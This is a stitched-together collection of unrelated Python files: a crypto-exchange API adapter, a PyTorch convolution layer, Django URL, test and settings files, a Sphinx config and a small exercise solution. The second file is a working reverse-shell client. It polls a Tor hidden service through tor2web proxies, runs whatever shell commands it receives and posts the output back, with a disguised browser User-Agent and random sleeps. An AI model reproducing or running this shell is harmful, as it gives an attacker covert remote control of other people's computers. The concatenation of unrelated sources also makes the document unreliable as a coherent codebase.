maker = self.safe_number(firstFee, 'maker_fee', 0.0)
taker = self.safe_number(firstFee, 'taker_fee', 0.0)
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'precision': precision,
'maker': maker,
'taker': taker,
'limits': limits,
'info': market,
'active': active,
})
return result
def fetch_currencies(self, params={}):
response = self.publicGetCurrency(params)
#
# {
# "next":null,
# "previous":null,
# "results":[
# {
# "name":"Argentine Peso",
# "symbol":"$",
# "currency":"ARS",
# "country":"AR",
# "decimal_places":"2",
# "enabled":true
# },
# {
# "name":"Bitcoin Cash",
# "symbol":"BCH",
# "currency":"BCH",
# "country":"AR",
# "decimal_places":"8",
# "enabled":true
# },
# {
# "name":"Bitcoin",
# "symbol":"BTC",
# "currency":"BTC",
# "country":"AR",
# "decimal_places":"8",
# "enabled":true
# }
# ]
# }
#
results = self.safe_value(response, 'results', [])
result = {}
for i in range(0, len(results)):
currency = results[i]
id = self.safe_string(currency, 'currency')
code = self.safe_currency_code(id)
name = self.safe_string(currency, 'name')
active = self.safe_value(currency, 'enabled', True)
precision = self.safe_integer(currency, 'decimal_places')
result[code] = {
'id': id,
'code': code,
'name': name,
'info': currency, # the original payload
'active': active,
'fee': None,
'precision': precision,
'limits': {
'amount': {'min': None, 'max': None},
'withdraw': {'min': None, 'max': None},
},
}
return result
def parse_ticker(self, ticker, market=None):
#
# fetchTicker, fetchTickers
#
# {
# "pair":"BTC_USDC",
# "last_price":"10850.02",
# "low":"10720.03",
# "high":"10909.99",
# "variation":"1.21",
# "volume":"0.83868",
# "base":"BTC",
# "base_name":"Bitcoin",
# "quote":"USDC",
# "quote_name":"USD Coin",
# "bid":"10811.00",
# "ask":"10720.03",
# "avg":"10851.47",
# "ask_volume":"0.00140",
# "bid_volume":"0.00185",
# "created_at":"2020-09-28 21:44:51.228920+00:00"
# }
#
timestamp = self.parse8601(self.safe_string(ticker, 'created_at'))
marketId = self.safe_string(ticker, 'pair')
symbol = self.safe_symbol(marketId, market)
last = self.safe_number(ticker, 'last_price')
average = self.safe_number(ticker, 'avg')
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_number(ticker, 'high'),
'low': self.safe_number(ticker, 'low'),
'bid': self.safe_number(ticker, 'bid'),
'bidVolume': self.safe_number(ticker, 'bid_volume'),
'ask': self.safe_number(ticker, 'ask'),
'askVolume': self.safe_number(ticker, 'ask_volume'),
'vwap': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': average,
'baseVolume': None,
'quoteVolume': None,
'info': ticker,
}
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
}
response = self.publicGetRatePair(self.extend(request, params))
#
# {
# "pair":"BTC_USDC",
# "last_price":"10850.02",
# "low":"10720.03",
# "high":"10909.99",
# "variation":"1.21",
# "volume":"0.83868",
# "base":"BTC",
# "base_name":"Bitcoin",
# "quote":"USDC",
# "quote_name":"USD Coin",
# "bid":"10811.00",
# "ask":"10720.03",
# "avg":"10851.47",
# "ask_volume":"0.00140",
# "bid_volume":"0.00185",
# "created_at":"2020-09-28 21:44:51.228920+00:00"
# }
#
return self.parse_ticker(response, market)
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
response = self.publicGetRateAll(params)
#
# [
# {
# "pair":"BTC_USDC",
# "last_price":"10850.02",
# "low":"10720.03",
# "high":"10909.99",
# "variation":"1.21",
# "volume":"0.83868",
# "base":"BTC",
# "base_name":"Bitcoin",
# "quote":"USDC",
# "quote_name":"USD Coin",
# "bid":"10811.00",
# "ask":"10720.03",
# "avg":"10851.47",
# "ask_volume":"0.00140",
# "bid_volume":"0.00185",
# "created_at":"2020-09-28 21:44:51.228920+00:00"
# }
# ]
#
result = {}
for i in range(0, len(response)):
ticker = self.parse_ticker(response[i])
symbol = ticker['symbol']
result[symbol] = ticker
return self.filter_by_array(result, 'symbol', symbols)
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
request = {
'pair': self.market_id(symbol),
}
response = self.publicGetOrderbookPair(self.extend(request, params))
#
# {
# "buy":[
# {"amount":"0.00230","total":"24.95","price":"10850.02"},
# {"amount":"0.07920","total":"858.52","price":"10840.00"},
# {"amount":"0.00277","total":"30.00","price":"10833.03"},
# ],
# "sell":[
# {"amount":"0.03193","total":"348.16","price":"10904.00"},
# {"amount":"0.00210","total":"22.90","price":"10905.70"},
# {"amount":"0.00300","total":"32.72","price":"10907.98"},
# ],
# "updated_id":47225
# }
#
orderbook = self.parse_order_book(response, symbol, None, 'buy', 'sell', 'price', 'amount')
orderbook['nonce'] = self.safe_integer(response, 'updated_id')
return orderbook
def parse_trade(self, trade, market=None):
#
# public fetchTrades, private fetchMyTrades
#
# {
# "created_at":1601322501,
# "amount":"0.00276",
# "price":"10850.020000",
# "side":"SELL",
# "pair":"BTC_USDC",
# "taker_fee":"0",
# "taker_side":"SELL",
# "maker_fee":"0",
# "taker":2577953,
# "maker":2577937
# }
#
# createOrder fills
#
# {
# "pair":"BTC_USDC",
# "exchanged":0.002,
# "match_price":10593.99,
# "maker_fee":0.0,
# "taker_fee":0.0,
# "timestamp":1601730306942
# }
#
id = self.safe_string(trade, 'id')
timestamp = self.safe_integer(trade, 'timestamp')
timestamp = self.safe_timestamp(trade, 'created_at', timestamp)
side = self.safe_string(trade, 'side')
takerSide = self.safe_string(trade, 'taker_side')
takerOrMaker = 'taker' if (takerSide == side) else 'maker'
if side is not None:
side = side.lower()
priceString = self.safe_string_2(trade, 'price', 'match_price')
amountString = self.safe_string_2(trade, 'amount', 'exchanged')
price = self.parse_number(priceString)
amount = self.parse_number(amountString)
cost = self.parse_number(Precise.string_mul(priceString, amountString))
marketId = self.safe_string(trade, 'pair')
market = self.safe_market(marketId, market)
feeCost = self.safe_number(trade, takerOrMaker + '_fee')
orderId = self.safe_string(trade, takerOrMaker)
fee = None
if feeCost is not None:
fee = {
'cost': feeCost,
'currency': market['base'] if (side == 'buy') else market['quote'],
}
return {
'id': id,
'order': orderId,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': market['symbol'],
'type': None,
'side': side,
'price': price,
'amount': amount,
'cost': cost,
'takerOrMaker': takerOrMaker,
'fee': fee,
'info': trade,
}
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
}
response = self.publicGetTradehistoryPair(self.extend(request, params))
#
# [
# {
# "created_at":1601322501,
# "amount":"0.00276",
# "price":"10850.020000",
# "side":"SELL",
# "pair":"BTC_USDC",
# "taker_fee":"0",
# "taker_side":"SELL",
# "maker_fee":"0",
# "taker":2577953,
# "maker":2577937
# }
# ]
#
return self.parse_trades(response, market, since, limit)
def fetch_balance(self, params={}):
self.load_markets()
response = self.privateGetBalancesExchangeBalances(params)
#
# [
# {
# "id":603794,
# "currency":"USD Coin",
# "symbol":"USDC",
# "available":"0",
# "locked":"0",
# "code":"exchange",
# "balance_type":"crypto"
# },
# ]
#
result = {'info': response}
for i in range(0, len(response)):
balance = response[i]
currencyId = self.safe_string(balance, 'symbol')
code = self.safe_currency_code(currencyId)
account = self.account()
account['free'] = self.safe_string(balance, 'available')
account['used'] = self.safe_string(balance, 'locked')
result[code] = account
return self.parse_balance(result)
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
market = self.market(symbol)
uppercaseType = type.upper()
uppercaseSide = side.upper()
request = {
'pair': market['id'],
'order_type': uppercaseType, # LIMIT, MARKET
'side': uppercaseSide, # BUY or SELL
'amount': self.amount_to_precision(symbol, amount),
}
if uppercaseType == 'LIMIT':
request['limit_price'] = self.price_to_precision(symbol, price)
response = self.privatePostOrderPair(self.extend(request, params))
#
# {
# "order_id": "160f523c-f6ef-4cd1-a7c9-1a8ede1468d8",
# "pair": "BTC_ARS",
# "side": "BUY",
# "amount": "0.00400",
# "notional": null,
# "fill_or_kill": False,
# "all_or_none": False,
# "order_type": "LIMIT",
# "status": "OPEN",
# "created_at": 1578413945,
# "filled": "0.00000",
# "limit_price": "10.00",
# "stop_price": null,
# "distance": null
# }
#
# createOrder market type
#
# {
# "order_id":"d6b60c01-8624-44f2-9e6c-9e8cd677ea5c",
# "pair":"BTC_USDC",
# "side":"BUY",
# "amount":"0.00200",
# "notional":"50",
# "fill_or_kill":false,
# "all_or_none":false,
# "order_type":"MARKET",
# "status":"OPEN",
# "created_at":1601730306,
# "filled":"0.00000",
# "fill_price":10593.99,
# "fee":0.0,
# "fills":[
# {
# "pair":"BTC_USDC",
# "exchanged":0.002,
# "match_price":10593.99,
# "maker_fee":0.0,
# "taker_fee":0.0,
# "timestamp":1601730306942
# }
# ],
# "filled_at":"2020-10-03T13:05:06.942186Z",
# "limit_price":"0.000000",
# "stop_price":null,
# "distance":null
# }
#
return self.parse_order(response, market)
def cancel_order(self, id, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' cancelOrder() requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
'order_id': id,
}
response = self.privatePostOrderPairOrderIdCancel(self.extend(request, params))
#
# {
# "order_id": "286e560e-b8a2-464b-8b84-15a7e2a67eab",
# "pair": "BTC_ARS",
# "side": "SELL",
# "amount": "0.00100",
# "notional": null,
# "fill_or_kill": False,
# "all_or_none": False,
# "order_type": "LIMIT",
# "status": "CANC",
# "created_at": 1575472707,
# "filled": "0.00000",
# "limit_price": "681000.00",
# "stop_price": null,
# "distance": null
# }
#
return self.parse_order(response, market)
def fetch_order(self, id, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOrder() requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
'order_id': id,
}
response = self.privateGetOrderPairOrderId(self.extend(request, params))
#
# {
# "order_id": "0b4ff48e-cfd6-42db-8d8c-3b536da447af",
# "pair": "BTC_ARS",
# "side": "BUY",
# "amount": "0.00100",
# "notional": null,
# "fill_or_kill": False,
# "all_or_none": False,
# "order_type": "LIMIT",
# "status": "OPEN",
# "created_at": 1575472944,
# "filled": "0.00000",
# "limit_price": "661000.00",
# "stop_price": null,
# "distance": null
# }
#
return self.parse_order(response, market)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOrders() requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
# 'status': 'OPEN,PART,CLOS,CANC,COMP',
# 'offset': 0,
# 'limit': limit,
}
if limit is not None:
request['offset'] = limit
response = self.privateGetOrderPair(self.extend(request, params))
#
# {
# "next": "https://api.exchange.ripio.com/api/v1/order/BTC_ARS/?limit=20&offset=20&page=1&page_size=25&status=OPEN%2CPART",
# "previous": null,
# "results": {
# "data": [
# {
# "order_id": "ca74280b-6966-4b73-a720-68709078922b",
# "pair": "BTC_ARS",
# "side": "SELL",
# "amount": "0.00100",
# "notional": null,
# "fill_or_kill": False,
# "all_or_none": False,
# "order_type": "LIMIT",
# "status": "OPEN",
# "created_at": 1578340134,
# "filled": "0.00000",
# "limit_price": "665000.00",
# "stop_price": null,
# "distance": null
# },
# ]
# }
# }
#
results = self.safe_value(response, 'results', {})
data = self.safe_value(results, 'data', [])
return self.parse_orders(data, market, since, limit)
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
request = {
'status': 'OPEN,PART',
}
return self.fetch_orders(symbol, since, limit, self.extend(request, params))
def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
request = {
'status': 'CLOS,CANC,COMP',
}
return self.fetch_orders(symbol, since, limit, self.extend(request, params))
def parse_order_status(self, status):
statuses = {
'OPEN': 'open',
'PART': 'open',
'CLOS': 'canceled',
'CANC': 'canceled',
'COMP': 'closed',
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
#
# createOrder, cancelOrder, fetchOpenOrders, fetchClosedOrders, fetchOrders, fetchOrder
#
# {
# "order_id": "286e560e-b8a2-464b-8b84-15a7e2a67eab",
# "pair": "BTC_ARS",
# "side": "SELL",
# "amount": "0.00100",
# "notional": null,
# "fill_or_kill": False,
# "all_or_none": False,
# "order_type": "LIMIT",
# "status": "CANC",
# "created_at": 1575472707,
# "filled": "0.00000",
# "limit_price": "681000.00",
# "stop_price": null,
# "distance": null
# }
#
# {
# "order_id":"d6b60c01-8624-44f2-9e6c-9e8cd677ea5c",
# "pair":"BTC_USDC",
# "side":"BUY",
# "amount":"0.00200",
# "notional":"50",
# "fill_or_kill":false,
# "all_or_none":false,
# "order_type":"MARKET",
# "status":"OPEN",
# "created_at":1601730306,
# "filled":"0.00000",
# "fill_price":10593.99,
# "fee":0.0,
# "fills":[
# {
# "pair":"BTC_USDC",
# "exchanged":0.002,
# "match_price":10593.99,
# "maker_fee":0.0,
# "taker_fee":0.0,
# "timestamp":1601730306942
# }
# ],
# "filled_at":"2020-10-03T13:05:06.942186Z",
# "limit_price":"0.000000",
# "stop_price":null,
# "distance":null
# }
#
id = self.safe_string(order, 'order_id')
amount = self.safe_number(order, 'amount')
cost = self.safe_number(order, 'notional')
type = self.safe_string_lower(order, 'order_type')
priceField = 'fill_price' if (type == 'market') else 'limit_price'
price = self.safe_number(order, priceField)
side = self.safe_string_lower(order, 'side')
status = self.parse_order_status(self.safe_string(order, 'status'))
timestamp = self.safe_timestamp(order, 'created_at')
average = self.safe_value(order, 'fill_price')
filled = self.safe_number(order, 'filled')
remaining = None
fills = self.safe_value(order, 'fills')
trades = None
lastTradeTimestamp = None
if fills is not None:
numFills = len(fills)
if numFills > 0:
filled = 0
cost = 0
trades = self.parse_trades(fills, market, None, None, {
'order': id,
'side': side,
})
for i in range(0, len(trades)):
trade = trades[i]
filled = self.sum(trade['amount'], filled)
cost = self.sum(trade['cost'], cost)
lastTradeTimestamp = trade['timestamp']
if (average is None) and (filled > 0):
average = cost / filled
if filled is not None:
if (cost is None) and (price is not None):
cost = price * filled
if amount is not None:
remaining = max(0, amount - filled)
marketId = self.safe_string(order, 'pair')
symbol = self.safe_symbol(marketId, market, '_')
stopPrice = self.safe_number(order, 'stop_price')
return {
'id': id,
'clientOrderId': None,
'info': order,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': lastTradeTimestamp,
'symbol': symbol,
'type': type,
'timeInForce': None,
'postOnly': None,
'side': side,
'price': price,
'stopPrice': stopPrice,
'amount': amount,
'cost': cost,
'average': average,
'filled': filled,
'remaining': remaining,
'status': status,
'fee': None,
'trades': trades,
}
def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchMyTrades() requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
# 'offset': 0,
# 'limit': limit,
}
if limit is not None:
request['limit'] = limit
response = self.privateGetTradePair(self.extend(request, params))
#
# {
# "next": "https://api.exchange.ripio.com/api/v1/trade/<pair>/?limit=20&offset=20",
# "previous": null,
# "results": {
# "data": [
# {
# "created_at": 1578414028,
# "amount": "0.00100",
# "price": "665000.00",
# "side": "BUY",
# "taker_fee": "0",
# "taker_side": "BUY",
# "match_price": "66500000",
# "maker_fee": "0",
# "taker": 4892,
# "maker": 4889
# },
# ]
# }
# }
#
results = self.safe_value(response, 'results', {})
data = self.safe_value(results, 'data', [])
return self.parse_trades(data, market, since, limit)
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
request = '/' + self.version + '/' + self.implode_params(path, params)
url = self.urls['api'][api] + request
query = self.omit(params, self.extract_params(path))
if api == 'public':
if query:
url += '?' + self.urlencode(query)
elif api == 'private':
self.check_required_credentials()
if method == 'POST':
body = self.json(query)
else:
if query:
url += '?' + self.urlencode(query)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + self.apiKey,
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is None:
return
#
# {"detail":"Authentication credentials were not provided."}
# {"status_code":400,"errors":{"pair":["Invalid pair FOOBAR"]},"message":"An error has occurred, please check the form."}
# {"status_code":400,"errors":{"order_type":["Invalid order type. Valid options: ['MARKET', 'LIMIT']"]},"message":"An error has occurred, please check the form."}
# {"status_code":400,"errors":{"non_field_errors":"Something unexpected ocurred!"},"message":"Seems like an unexpected error occurred. Please try again later or write us to support@ripio.com if the problem persists."}
# {"status_code":400,"errors":{"pair":["Invalid/Disabled pair BTC_ARS"]},"message":"An error has occurred, please check the form."}
#
detail = self.safe_string(response, 'detail')
if detail is not None:
feedback = self.id + ' ' + body
# self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)
self.throw_broadly_matched_exception(self.exceptions['broad'], detail, feedback)
errors = self.safe_value(response, 'errors')
if errors is not None:
feedback = self.id + ' ' + body
keys = list(errors.keys())
for i in range(0, len(keys)):
key = keys[i]
error = self.safe_value(errors, key, [])
message = self.safe_string(error, 0)
# self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)
self.throw_broadly_matched_exception(self.exceptions['broad'], message, feedback)
raise ExchangeError(feedback) # unknown message
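# Illustrative usage sketch following the usual ccxt calling convention (the API key
# below is a placeholder, not a real credential; public endpoints such as fetch_ticker
# need no credentials at all):
#
#   import ccxt
#   exchange = ccxt.ripio({'apiKey': 'YOUR_API_KEY'})
#   exchange.load_markets()
#   print(exchange.fetch_ticker('BTC/USDC'))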
|
# python 3
# requires reverse_https-tor2web_listener.py running as a tor hidden service on connect back host
# encoding is not quite right - multi-line returns (e.g., that of `dir`) format poorly
from urllib.request import urlopen,Request
from urllib.parse import urlencode
from urllib.error import URLError
from subprocess import Popen,PIPE
from random import randint
from time import sleep
# change this to the Tor HS identifier + tor2web server
# todo - cycle through various t2w servers if one is not responding
url = 'https://xmgem22g7efpwwqd.tor2web.org/'
#url = 'https://xmgem22g7efpwwqd.tor2web.fi/'
#url = 'https://xmgem22g7efpwwqd.onion.sh/'
headers = {
'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Charset' : 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
'Accept-Language' : 'en-US,en;q=0.8',
'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31',
}
active = False
while True:
# set up POST to url
data = {'stage' : 'probe',}
data = urlencode(data)
data = bytes(data, 'UTF-8')
req = Request(url, data, headers)
try:
response = urlopen(req)
html = response.readlines(512)
for l in html:
l = str(l)
if '<!-- t2wsh;;' in str(l):
cmd = l.split(';;')[1]
if cmd == 'endsession':
exit()
elif len(cmd) > 0:
#print('\n\nreceived command: %s' % (cmd))
proc = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE, stdin=PIPE)
cmdout = proc.stdout.read() + proc.stderr.read()
data = { 'stage' : 'output', 'cmdout' : '%s' % (cmdout), }
print(q for q in data)
data = urlencode(data)
print(data)
data = bytes(data, 'UTF-8')
print(data)
req = Request(url, data, headers)
response = urlopen(req)
active = True
else:
break
else:
active = False
except URLError as e:
# tor2web proxies are unreliable - this condition may occur
# frequently even with a fully functional listener and internet
# connection. Waiting helps.
print('Error opening URL: %s' % (e))
active = False
if not active:
# sleep for a while
t = randint(10,60)
print('sleeping %s' % (t))
sleep(t)
|
# coding=utf-8
import math
import torch
import numpy as np
from torch.nn import init
from itertools import repeat
from torch.nn import functional as F
import collections.abc as container_abcs
from typing import Optional
from torch.nn.parameter import Parameter
from torch.nn.modules.module import Module
class DOConv2d(Module):
"""
DOConv2d can be used as an alternative for torch.nn.Conv2d.
The interface is similar to that of Conv2d, with one exception:
1. D_mul: the depth multiplier for the over-parameterization.
Note that the groups parameter switches between DO-Conv (groups=1),
DO-DConv (groups=in_channels), DO-GConv (otherwise).
"""
__constants__ = ['stride', 'padding', 'dilation', 'groups',
'padding_mode', 'output_padding', 'in_channels',
'out_channels', 'kernel_size', 'D_mul']
__annotations__ = {'bias': Optional[torch.Tensor]}
def __init__(self, in_channels, out_channels, kernel_size, D_mul=None, stride=1,
padding=0, dilation=1, groups=1, bias=True, padding_mode='zeros'):
super(DOConv2d, self).__init__()
kernel_size = _pair(kernel_size)
stride = _pair(stride)
padding = _pair(padding)
dilation = _pair(dilation)
if in_channels % groups != 0:
raise ValueError('in_channels must be divisible by groups')
if out_channels % groups != 0:
raise ValueError('out_channels must be divisible by groups')
valid_padding_modes = {'zeros', 'reflect', 'replicate', 'circular'}
if padding_mode not in valid_padding_modes:
raise ValueError("padding_mode must be one of {}, but got padding_mode='{}'".format(
valid_padding_modes, padding_mode))
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
self.padding_mode = padding_mode
self._padding_repeated_twice = tuple(x for x in self.padding for _ in range(2))
#################################### Initialization of D & W ###################################
M = self.kernel_size[0]
N = self.kernel_size[1]
self.D_mul = M * N if D_mul is None or M * N <= 1 else D_mul
self.W = Parameter(torch.Tensor(out_channels, in_channels // groups, self.D_mul))
init.kaiming_uniform_(self.W, a=math.sqrt(5))
if M * N > 1:
self.D = Parameter(torch.Tensor(in_channels, M * N, self.D_mul))
init_zero = np.zeros([in_channels, M * N, self.D_mul], dtype=np.float32)
self.D.data = torch.from_numpy(init_zero)
eye = torch.reshape(torch.eye(M * N, dtype=torch.float32), (1, M * N, M * N))
D_diag = eye.repeat((in_channels, 1, self.D_mul // (M * N)))
if self.D_mul % (M * N) != 0: # the cases when D_mul > M * N
zeros = torch.zeros([in_channels, M * N, self.D_mul % (M * N)])
self.D_diag = Parameter(torch.cat([D_diag, zeros], dim=2), requires_grad=False)
else: # the case when D_mul = M * N
self.D_diag = Parameter(D_diag, requires_grad=False)
##################################################################################################
if bias:
self.bias = Parameter(torch.Tensor(out_channels))
fan_in, _ = init._calculate_fan_in_and_fan_out(self.W)
bound = 1 / math.sqrt(fan_in)
init.uniform_(self.bias, -bound, bound)
else:
self.register_parameter('bias', None)
def extra_repr(self):
s = ('{in_channels}, {out_channels}, kernel_size={kernel_size}'
', stride={stride}')
if self.padding != (0,) * len(self.padding):
s += ', padding={padding}'
if self.dilation != (1,) * len(self.dilation):
s += ', dilation={dilation}'
if self.groups != 1:
s += ', groups={groups}'
if self.bias is None:
s += ', bias=False'
if self.padding_mode != 'zeros':
s += ', padding_mode={padding_mode}'
return s.format(**self.__dict__)
def __setstate__(self, state):
super(DOConv2d, self).__setstate__(state)
if not hasattr(self, 'padding_mode'):
self.padding_mode = 'zeros'
def _conv_forward(self, input, weight):
if self.padding_mode != 'zeros':
return F.conv2d(F.pad(input, self._padding_repeated_twice, mode=self.padding_mode),
weight, self.bias, self.stride,
_pair(0), self.dilation, self.groups)
return F.conv2d(input, weight, self.bias, self.stride,
self.padding, self.dilation, self.groups)
def forward(self, input):
M = self.kernel_size[0]
N = self.kernel_size[1]
DoW_shape = (self.out_channels, self.in_channels // self.groups, M, N)
if M * N > 1:
######################### Compute DoW #################
# (input_channels, D_mul, M * N)
D = self.D + self.D_diag
W = torch.reshape(self.W, (self.out_channels // self.groups, self.in_channels, self.D_mul))
# einsum outputs (out_channels // groups, in_channels, M * N),
# which is reshaped to
# (out_channels, in_channels // groups, M, N)
DoW = torch.reshape(torch.einsum('ims,ois->oim', D, W), DoW_shape)
#######################################################
else:
# in this case D_mul == M * N
# reshape from
# (out_channels, in_channels // groups, D_mul)
# to
# (out_channels, in_channels // groups, M, N)
DoW = torch.reshape(self.W, DoW_shape)
return self._conv_forward(input, DoW)
def _ntuple(n):
def parse(x):
if isinstance(x, container_abcs.Iterable):
return x
return tuple(repeat(x, n))
return parse
_pair = _ntuple(2)
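# Minimal usage sketch, assuming DOConv2d mirrors the torch.nn.Conv2d call signature
# as the class docstring above states; the input shape below is illustrative only.
if __name__ == '__main__':
    x = torch.randn(1, 3, 32, 32)                       # dummy batch of RGB images
    conv = DOConv2d(in_channels=3, out_channels=8, kernel_size=3, padding=1)
    y = conv(x)
    print(y.shape)                                       # expected: torch.Size([1, 8, 32, 32])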
|
from django.urls import path
from . import views
from .apps import app_name
urlpatterns = [
path('', views.FblogListView.as_view(), name='list'),
path('create/', views.FblogCreateView.as_view(),
name='create'),
]
|
from .cgnet import CGNet
from .fast_scnn import FastSCNN
from .hrnet import HRNet
from .mobilenet_v2 import MobileNetV2
from .mobilenet_v3 import MobileNetV3
from .resnest import ResNeSt
from .resnet import ResNet, ResNetV1c, ResNetV1d
from .resnet import ResNet_sp, ResNetV1c_sp, ResNetV1d_sp
from .resnext import ResNeXt
from .unet import UNet
from .swin_transformer import SwinTransformer
from .swin_transformer_3d import SwinTransformer3D
from .swin_transformer_3d_v2 import SwinTransformer3Dv2
from .swin_transformer_3d_v3 import SwinTransformer3Dv3
__all__ = [
'ResNet', 'ResNetV1c', 'ResNetV1d', 'ResNeXt', 'HRNet', 'FastSCNN', 'SwinTransformer3D', 'SwinTransformer3Dv2',
'ResNeSt', 'MobileNetV2', 'UNet', 'CGNet', 'MobileNetV3', 'SwinTransformer', 'SwinTransformer3Dv3',
'ResNet_sp', 'ResNetV1c_sp', 'ResNetV1d_sp',
]
|
import pytest
from django.urls import resolve, reverse
from django_machinelearning.users.models import User
pytestmark = pytest.mark.django_db
def test_detail(user: User):
assert (
reverse("users:detail", kwargs={"username": user.username})
== f"/users/{user.username}/"
)
assert resolve(f"/users/{user.username}/").view_name == "users:detail"
def test_update():
assert reverse("users:update") == "/users/~update/"
assert resolve("/users/~update/").view_name == "users:update"
def test_redirect():
assert reverse("users:redirect") == "/users/~redirect/"
assert resolve("/users/~redirect/").view_name == "users:redirect"
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Submission file for the python difference_of_squares exercise.
#
# v2: Using "x*x" instead of the slower "x**2" and remove left over
# "pass" statement in difference()
# v1: Using sum(), abs(), range() and "**2"
def difference(length):
"""
Return the (absolute) difference between the Square of Sums and the
Sum of Squares in the interval [1, length].
"""
return abs(square_of_sum(length) - sum_of_squares(length))
def square_of_sum(length):
"""
Return the Square of Sums in the interval [1, length].
"""
s = sum(range(1, length+1))
return s*s
def sum_of_squares(length):
"""
Return the sum of Squares in the interval [1, length].
"""
return sum(x*x for x in range(1, length+1))
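# Quick sanity check of the helpers above for length = 10 (well-known exercise values):
if __name__ == "__main__":
    print(square_of_sum(10))    # 3025
    print(sum_of_squares(10))   # 385
    print(difference(10))       # 2640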
|
"""
Test settings for merlin project.
- Used to run tests fast on the continuous integration server and locally
"""
from .base import * # noqa
# DEBUG
# ------------------------------------------------------------------------------
# Turn debug off so tests run faster
DEBUG = False
TEMPLATES[0]['OPTIONS']['debug'] = False
# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key is only used for development and testing.
SECRET_KEY = env('DJANGO_SECRET_KEY', default='CHANGEME!!!')
# Mail settings
# ------------------------------------------------------------------------------
EMAIL_HOST = 'localhost'
EMAIL_PORT = 1025
# In-memory email backend stores messages in django.core.mail.outbox
# for unit testing purposes
EMAIL_BACKEND = 'django.core.mail.backends.locmem.EmailBackend'
# CACHING
# ------------------------------------------------------------------------------
# Speed advantages of in-memory caching without having to run Memcached
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
# TESTING
# ------------------------------------------------------------------------------
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
# PASSWORD HASHING
# ------------------------------------------------------------------------------
# Use fast password hasher so tests run faster
PASSWORD_HASHERS = [
'django.contrib.auth.hashers.MD5PasswordHasher',
]
# TEMPLATE LOADERS
# ------------------------------------------------------------------------------
# Keep templates in memory so tests run faster
TEMPLATES[0]['OPTIONS']['loaders'] = [
['django.template.loaders.cached.Loader', [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
], ],
]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# dagger documentation build configuration file, created by
# sphinx-quickstart on Fri Jun 9 13:47:02 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath(".."))
import dagger
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ["sphinx.ext.autodoc", "sphinx.ext.viewcode", "numpydoc"]
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = ".rst"
# The master toctree document.
master_doc = "index"
# General information about the project.
project = u"dagger"
copyright = u"2019, David Siklosi"
author = u"David Siklosi"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = dagger.__version__
# The full version, including alpha/beta/rc tags.
release = dagger.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# These patterns also affect html_static_path and html_extra_path
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
